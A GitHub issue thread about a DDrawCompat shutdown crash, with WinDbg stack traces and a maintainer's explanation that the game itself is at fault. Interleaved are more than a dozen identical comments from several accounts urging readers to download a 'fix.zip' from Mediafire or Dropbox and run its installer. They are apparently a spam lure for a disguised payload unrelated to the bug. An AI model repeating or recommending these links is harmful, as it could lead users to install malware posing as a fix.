### ISSUE TITLE
Crash on shutdown

### ISSUE THREAD

**Issue by automatedbugreportingfacility** [narzoul/DDrawCompat#350]
As I was testing the fix for #342, I noticed that with `CrashDump = full` being used, a 365 MB dump is generated after every game run.

```
0:000> .ecxr
eax=00000000 ebx=2700120b ecx=2700120b edx=00000000 esi=002a1184 edi=00000085
eip=2700120b esp=0019f56c ebp=0019f594 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
<Unloaded_svpdrv.dll>+0x120b:
2700120b ??              ???

[0x0]   <Unloaded_svpdrv.dll> + 0x120b!<Unloaded_svpdrv.dll>+0x120b   0x19f56c   0x777b1b7b   
[0x1]   user32!_InternalCallWinProc+0x2b   0x19f570   0x777a7fca   
[0x2]   user32!UserCallWinProcCheckWow+0x33a   0x19f59c   0x777a7786   
[0x3]   user32!CallWindowProcAorW+0x7f   0x19f684   0x7779486b   
[0x4]   user32!CallWindowProcA+0x1b   0x19f6bc   0x5e3f184a   
[0x5]   ddraw!`anonymous namespace'::ddcWindowProc+0x36a [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 210]   0x19f6d4   0x5e3f1da9   
[0x6]   ddraw!`anonymous namespace'::ddcWindowProcA+0x69 [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 295]   0x19f7e4   0x777b1b7b   
[0x7]   user32!_InternalCallWinProc+0x2b   0x19f81c   0x777a7fca   
[0x8]   user32!UserCallWinProcCheckWow+0x33a   0x19f848   0x777a7bca   
[0x9]   user32!DispatchClientMessage+0xea   0x19f930   0x777ac09f   
[0xa]   user32!__fnDWORD+0x3f   0x19f994   0x779954ed   
[0xb]   ntdll!KiUserCallbackDispatcher+0x4d   0x19f9d0   0x76de113c   
[0xc]   win32u!NtUserRedrawWindow+0xc   0x19fa08   0x72247817   
[0xd]   apphelp!DWM8AND16BitHook_RedrawWindow+0x27   0x19fa0c   0x5e3f17cd   
[0xe]   ddraw!`anonymous namespace'::ddcWindowProc+0x2ed [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 196]   0x19fa28   0x5e3f1da9   
[0xf]   ddraw!`anonymous namespace'::ddcWindowProcA+0x69 [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 295]   0x19fb34   0x777b1b7b   
[0x10]   user32!_InternalCallWinProc+0x2b   0x19fb6c   0x777a7fca   
[0x11]   user32!UserCallWinProcCheckWow+0x33a   0x19fb98   0x777a7bca   
[0x12]   user32!DispatchClientMessage+0xea   0x19fc80   0x777ac09f   
[0x13]   user32!__fnDWORD+0x3f   0x19fce4   0x779954ed   
[0x14]   ntdll!KiUserCallbackDispatcher+0x4d   0x19fd20   0x76de101c   
[0x15]   win32u!NtUserPeekMessage+0xc   0x19fd58   0x777ac33a   
[0x16]   user32!_PeekMessage+0x2a   0x19fd5c   0x7779074d   
[0x17]   user32!PeekMessageA+0x19d   0x19fdac   0x5e3f2fc4   
[0x18]   ddraw!`anonymous namespace'::peekMessage+0x64 [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 629]   0x19fde8   0x5e3f32dc   
[0x19]   ddraw!`anonymous namespace'::peekMessageA+0x2c [D:\Development\DDrawCompat\DDrawCompat\Gdi\WinProc.cpp @ 685]   0x19fe64   0x5f40c328   
[0x1a]   Mfc42!Ordinal5715+0x1d   0x19fe84   0x0   

```

DDrawCompat tries to call the original window procedure to handle a `WM_NCPAINT` message, but it's no longer alive.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by narzoul** [comment]
I don't think this has anything to do with DDrawCompat. ddcWindowProc is just a wrapper around the original window procedure, which should crash all the same without it.

You probably won't get a crash dump from Windows in cases when the exception happens during process shutdown (I remember reading about this somewhere a long time ago), but I was able to catch a similar exception without DDrawCompat by running the game through a debugger. I believe it's something that would need to be patched in the game executable, but I don't support such cases here.

It's not a good idea to leave the CrashDump setting enabled permanently. It might interfere with exception handlers built in to the application itself, and it could lead to such useless dumps during process exit.

**Comment by automatedbugreportingfacility** [comment]
Thanks, I thought that might be due to a DDrawCompat thread persisting for too long, but now I also managed to catch the exception without DDrawCompat. Not too easy considering that WinDbg is behind the black game window and there seems to be no way to focus the debugger using Alt+Tab (in contrast to, say, Task Manager, which has an option to stay always on top), but I extracted the stack trace with some automatic logging:

```
00 0019f8ec 777b1b7b     <Unloaded_svpdrv.dll>+0x120b
01 0019f918 777a7fca     USER32!_InternalCallWinProc+0x2b
02 0019fa00 777a7bca     USER32!UserCallWinProcCheckWow+0x33a
03 0019fa64 777af909     USER32!DispatchClientMessage+0xea
04 0019faa0 779954ed     USER32!__fnINOUTLPWINDOWPOS+0x39
05 0019faf0 757da76c     ntdll!KiUserCallbackDispatcher+0x4d
06 0019fb00 757da68b     MSCTF!SYSTHREAD::DestroyThreadMessageWindow+0x39
07 0019fb28 757bfa9a     MSCTF!CCtfClientPort::`scalar deleting destructor'+0x3b
08 0019fb3c 757d31b8     MSCTF!CCtfClientPort::Release+0x32
09 0019fbac 757dedc5     MSCTF!CThreadInputMgr::OnActivationChange+0x9d
0a 0019fc04 757ded14     MSCTF!CThreadInputMgr::Deactivate+0x55
0b 0019fc30 757c4c30     MSCTF!CicBridge::DeactivateIMMX+0x127
0c 0019fc4c 757c4bcd     MSCTF!CicBridge::~CicBridge+0x4b
0d 0019fc58 757c4bb4     MSCTF!CicBridge::`vector deleting destructor'+0xd
0e 0019fc70 757c4b4f     MSCTF!CicBridge::Release+0x34
0f 0019fc80 757df727     MSCTF!TLS::InternalDestroyTLS+0x3a
10 0019fc88 757df8d5     MSCTF!TF_UninitThreadSystem+0x20
11 0019fccc 779548d1     MSCTF!CicFlsCallback+0x35
12 0019fcfc 7797db2e     ntdll!RtlpFlsDataCleanup+0xa8
13 0019fd98 7797da55     ntdll!LdrShutdownProcess+0xbe
14 0019fe68 75ec6a52     ntdll!RtlExitUserProcess+0xb5
15 0019fe7c 76cf6127     KERNEL32!ExitProcessImplementation+0x12
16 0019fe88 76cf6687     msvcrt!__crtExitProcess+0x17
17 0019fecc 76cf66a1     msvcrt!doexit+0x135
18 0019fee0 005093d4     msvcrt!exit+0x11
19 0019ff70 75ebfcc9     VRDMfc+0x93d4
1a 0019ff80 779880ce     KERNEL32!BaseThreadInitThunk+0x19
1b 0019ffdc 7798809e     ntdll!__RtlUserThreadStart+0x2f
1c 0019ffec 00000000     ntdll!_RtlUserThreadStart+0x1b
```

So yeah, it's the game being sloppy.

**Comment by narzoul** [comment]
I use a small utility called "Always on Top" to make any window "topmost". It helps with seeing the debugger during a breakpoint and such. Just alt-tab to the debugger window and press ctrl+space.
https://www.labnol.org/software/tutorials/keep-window-always-on-top/5213/
